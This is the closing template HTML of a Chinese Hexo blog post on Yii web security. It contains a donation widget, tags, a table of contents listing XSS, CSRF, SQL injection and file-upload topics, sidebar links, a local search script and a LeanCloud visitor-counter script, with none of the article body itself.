    <img id="wechat_subscriber_qcode" src="/images/my.jpg" alt="echo-ding wechat" style="width: 200px; max-width: 100%;"/>
    <div>欢迎您扫一扫上面的微信公众号，订阅我的博客！</div>
</div>

      </div>
    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/my.jpg" alt="echo-ding 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/my.jpg" alt="echo-ding 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/yii安全/" rel="tag"># yii安全</a>
          
            <a href="/tags/安全/" rel="tag"># 安全</a>
          
            <a href="/tags/xss/" rel="tag"># xss</a>
          
            <a href="/tags/csrf/" rel="tag"># csrf</a>
          
            <a href="/tags/sql注入/" rel="tag"># sql注入</a>
          
            <a href="/tags/文件上传漏洞/" rel="tag"># 文件上传漏洞</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/07/02/mysql/网站优化-Mysql/" rel="next" title="网站优化-Mysql">
                <i class="fa fa-chevron-left"></i> 网站优化-Mysql
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/07/02/yii/Yii-安装advanced版本/" rel="prev" title="Yii-安装advanced版本">
                Yii-安装advanced版本 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/my.jpg"
                alt="echo-ding" />
            
              <p class="site-author-name" itemprop="name">echo-ding</p>
              <p class="site-description motion-element" itemprop="description">less is more</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">39</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">25</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">42</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/bunao" target="_blank" title="GitHub" rel="external nofollow"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:ibunao@163.com" target="_blank" title="E-Mail" rel="external nofollow"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="http://weibo.com/your-user-name" target="_blank" title="微博" rel="external nofollow"><i class="fa fa-fw fa-globe"></i>微博</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="http://www.zhihu.com/people/your-user-name" target="_blank" title="知乎" rel="external nofollow"><i class="fa fa-fw fa-globe"></i>知乎</a>
                  
                </span>
              
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.bunao.me/" title="bunao" target="_blank">bunao</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#xss攻击"><span class="nav-number">1.</span> <span class="nav-text">xss攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#反射性xss"><span class="nav-number">1.1.</span> <span class="nav-text">反射性xss</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xxs蠕虫攻击"><span class="nav-number">1.2.</span> <span class="nav-text">xxs蠕虫攻击</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CSRF攻击"><span class="nav-number">2.</span> <span class="nav-text">CSRF攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF防御"><span class="nav-number">2.1.</span> <span class="nav-text">CSRF防御</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql注入"><span class="nav-number">3.</span> <span class="nav-text">sql注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#文件上传漏洞"><span class="nav-number">4.</span> <span class="nav-text">文件上传漏洞</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">echo-ding</span>

  

  
</div>


  



  <div class="powered-by">由 <a class="theme-link" target="_blank" rel="external nofollow" href="https://hexo.io">Hexo</a> 强力驱动 v3.3.7</div>








        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.4.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.4.2"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.4.2"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.4.2"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.4.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.4.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.4.2"></script>



  



  










  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script>
    
    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();

      Counter('get', '/classes/Counter', { where: JSON.stringify({ url }) })
        .done(function ({ results }) {
          if (results.length > 0) {
            var counter = results[0];
            
            Counter('put', `/classes/Counter/${counter.objectId}`, JSON.stringify({ time: { "__op":"Increment", "amount":1 } }))
            
            .done(function () {
                  var $element = $(document.getElementById(url));
                  $element.find('.leancloud-visitors-count').text(counter.time + 1);
            })
            
            .fail(function ({ responseJSON }) {
                console.log('Failed to save Visitor num, with error message: ' + responseJSON.error);
            })
          } else {
            
              var $element = $(document.getElementById(url));
              $element.find('.leancloud-visitors-count').text('Counter not initialized! See more at console err msg.');
              console.error('ATTENTION! LeanCloud counter has security bug, see here how to solve it: https://github.com/theme-next/hexo-leancloud-counter-security. \n But you also can use LeanCloud without security, by set \'security\' option to \'false\'.');
            
          }
        })
      .fail(function ({ responseJSON }) {
        console.log('LeanCloud Counter Error:' + responseJSON.code + " " + responseJSON.error);
      });
    }
    

    $(function() {
      $.get('https://app-router.leancloud.cn/2/route?appId=' + "JoifQWva3MrLxWwEjXGYYvNw-gzGzoHsz")
        .done(function ({ api_server }) {
          var Counter = function (method, url, data) {
            return $.ajax({
              method: method,
              url: `https://${api_server}/1.1${url}`,
              headers: {
                'X-LC-Id': "JoifQWva3MrLxWwEjXGYYvNw-gzGzoHsz",
                'X-LC-Key': "IEzrlKqyuxO8jhwp2ds1P0Rf",
                'Content-Type': 'application/json',
              },
              data: data,
            });
          };
          
          addCount(Counter);
          
        })
    });
  </script>



  

  

  

  
  

  

  

  

  

  

</body>
</html>
